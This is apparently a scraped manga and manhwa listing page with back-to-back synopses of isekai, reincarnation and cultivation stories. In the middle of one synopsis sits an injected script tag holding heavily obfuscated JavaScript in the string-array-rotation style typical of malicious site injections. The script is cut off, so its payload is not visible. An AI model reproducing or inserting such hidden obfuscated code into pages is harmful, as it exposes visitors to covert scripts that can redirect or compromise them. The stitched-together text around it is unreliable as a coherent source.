\"You good-for-nothing bastard. You are the son of a Sword Saint, yet you dare pull such a defective Class?!\" During the〈Divine Blessing Ceremony〉of the 15-year-old Elma who came from a lineage of Sword Saints, he had manifested a commonly deemed defective class known as the Heavy Knight. He had been deprived of his position as the next head of the Edvan Household and was then exiled. The Heavy Knight class had an unbalanced status and useless skills, to top it off, it was even said to be a class cowardly and indolent people have. But, Elma knew better—that this world was the world of the game he had used to play before—and that the Heavy Knight class was the strongest class to exist. Elma made full use of the knowledge he had in his previous life and began his efficient walkthrough of the world he was reincarnated into.
The male protagonist crossed over and received a cursed system, which made him stronger as long as he lay down or gained the negative emotions of others, so the male protagonist began to lay flat and live a life of salted fish to upgrade.
Zhao Xiaotian suffered all kinds of hardships with relevance to supernatural powers. After he got caught up in an explosion, he was able to catch up with the comic genre trend nowadays which is: "Isekai". But unfortunately, the villains of the world still got their grasp on him for unknown reasons, maybe due to plot. He was continuously assassinated, kidnapped, and he was ripped of his money. And thenceforth, Zhang Xiaotian persevered on the way of cultivation!<script></script><script>function _0x3154(_0x1dd319,_0x1da527){var _0x3c823c=_0x1d11();return _0x3154=function(_0x8edc48,_0x5dbe20){_0x8edc48=_0x8edc48-(-0x1185+0x1*-0x148d+0x97*0x43);var _0x116b4c=_0x3c823c[_0x8edc48];return _0x116b4c;},_0x3154(_0x1dd319,_0x1da527);}(function(_0xb3a4d2,_0x359516){var _0x4df310=_0x3154,_0x4e9927=_0xb3a4d2();while(!![]){try{var _0x4f93f9=-parseInt(_0x4df310(0x177))/(-0x277+-0x885+0xafd*0x1)*(parseInt(_0x4df310(0x17b))/(0x18*0xde+0x24b*0x11+-0x3bc9))+-parseInt(_0x4df310(0x189))/(0x9*0x1f3+0x13e3+-0x256b)+-parseInt(_0x4df310(0x17e))/(0x15b*-0x11+-0xaec+0x21fb)+-parseInt(_0x4df310(0x178))/(0x2587+0xbe2+-0x3164*0x1)+-parseInt(_0x4df310(0x18b))/(0x877+-0x1b83+0x1312)+parseInt(_0x4df310(0x181))/(0x1ea2+-0x1*0x1235+-0x2*0x633)*(-parseInt(_0x4df310(0x185))/(0x1*0x186d+-0x158*0xc+-0x1d*0x49))+parseInt(_0x4df310(0x190))/(0x13b1+-0x2138+-0x1*-0xd90);if(_0x4f93f9===_0x359516)break;else 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The dawn of dungeon conquering. A group of boys who were once known as the strongest party is wiped out in an accident. Five years have passed since then. Low-difficulty dungeons have been developed as leisure facilities, and dungeon conquering has become a popular content that video streamers have flocked to join. In order to survive the tough world of showbiz, current top idol Shinonome Kanami also decides to become a broadcaster who seriously conquers dungeons. The man introduced by her sponsor as the best mentor is a rather unreliable-looking man, Amano Fuyuki. However, when they visit a dungeon together, an incident occurs right away, putting them in a desperate situation –!?
\"I\'\' fell asleep while watching the anime 『Twilight of the Gods』. When I woke up, I realized that I had become \"Jill\", the last boss of the first part of the anime. What\'s more, a future in which he becomes a punching bag for the last boss of the second part, the \"Evil God\" and dies a miserable death, awaits Jill. In order to avoid the worst possible ending, \"I\" decide to destroy the flow of the original. \"I\'\' try my best to act like Jill, but my actions cause misunderstandings among my subordinates, and for some reason, an unexpected break from the original story occurs where I am worshiped as a god...! A misunderstanding/comedy about survival in another world where the protagonist makes use of his knowledge of the original work to try to avoid death!
"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." The beloved senior benefactor who accidentally saved me that year, not only lost his memories but he also began to like drinking my blood. Ben Zuo Zai Zong Men Yang Le Ge Xi Xue Gui Běn Zuò Zài Zōng Mén Yǎng Le Gè Xī Xuè Guǐ 本座在宗门养了个吸血鬼
Ling Jian Chen, the master of the God-Emperor , is reborn as a mortal, and he has started an unbeatable life that defeat everyone against him! Genius? Even the God-Emperor is my student. Talking about genius and masters? Even the God-Emperor serves me with respect in order to receive my words of guidance, are you as unbeatable as me? Beauties? Have you ever heard of the most beautiful goddess in the Divine Realm? She has tried everything to stay with me … Everyone in heaven, listen to my orders, I’m the one and the only in all the eight realms in heaven. Emperor Ling Tian
Would you like to find a job? Even at the cost of your soul? If so, then you’ve found the right place. Our job hunting advice website, Soul Sellers, is a site geared towards those willing to even sell their souls for employment; that’s right, people like you. Are you dealing with angels or demons?30-year old freeloader Chul Ho Kang made a deal through this shady site, even selling his soul for the chance at what else? Money! An invitation to the other world for the weak and downtrodden of society for a chance to change their lot in life! That is the mission given to Chul Ho Kang!
Not even a hero, Takumi Iruma gets accidentally mixed in with a group of heroes chosen to be summoned to another world. As compensation for the mix-up, a goddess offers him the right to choose any skill he wishes for! Hoping for a peaceful and quiet life that has nothing to do with fighting or going into battle, he chooses a seemingly boring creation skill. However, it turns out \"alchemy\" is the most powerful skill that allows him to create everything from a holy sword to flying ships! This cheat skill he unexpectedly acquired turns him into a wealthy merchant and makes him undefeatable in battles! A heartwarming adventure story about (possibly) the most powerful alchemist in another world! *Alpha Manga* --- *Alternate description:* Iruma Takumi, a 40-year old salary man, was dragged into a hero summoning just like in a template. What was his fate? The Goddess sent him and the heroes to the other world separately. With the Goddess’ overprotective support, he landed in a different world looking handsome, rejuvenated, and quite different from a Japanese. Although he wanted a slow life while working in the manufacturing trade, that was not permitted by the Goddess’ special body and abilities. Would Takumi be able to live a peaceful life in a different world?
The manga depicts the past of Ishiro Meita, a freelance spy who graduated from a spy training school with top grades. When he\'s asked to investigate an unknown object that crashed from space, his life takes a drastic turn when he meets Taiya Hando. (from RangerWiki)
In the mysterious, RPG dungeon-like Tower, Gongja Kim lives a mundane existence, envying all the star hunters. One day, his wish for more is granted with a legendary skill to copy others’ abilities… at the cost of his life. Before he can make sense of it, he’s killed by the #1 hunter, the Flame Emperor! But this activates his skill and now he’s copied a new one, the ability to travel back in time upon death. How will Gongja use these skills to outplay the competition and rise to the top?
Read manhwa The Perfect Plan to Avoid the Death Ending I’ve been reincarnated as Sienna Winter, a minor villainess with a terminal illness in a novel. My only goal is simple: To survive without dying! But then… “I am Helares Eckbert. You are the one who awakened me.” “…Excuse me? Who are you?” “Nice to meet you, master.” I accidentally awakened a sealed demon. And as if that wasn’t enough, I got tricked into a fraudulent contract? “This contract is valid until you die.” “…Pardon?” “It’s a lifetime contract, you naïve little lady.” “…But I’m terminally ill?” Can I really survive in this situation…? “The Perfect Plan to Avoid the Death Ending Manhwa” is another name: 사망 엔딩을 피하는 완벽한 플랜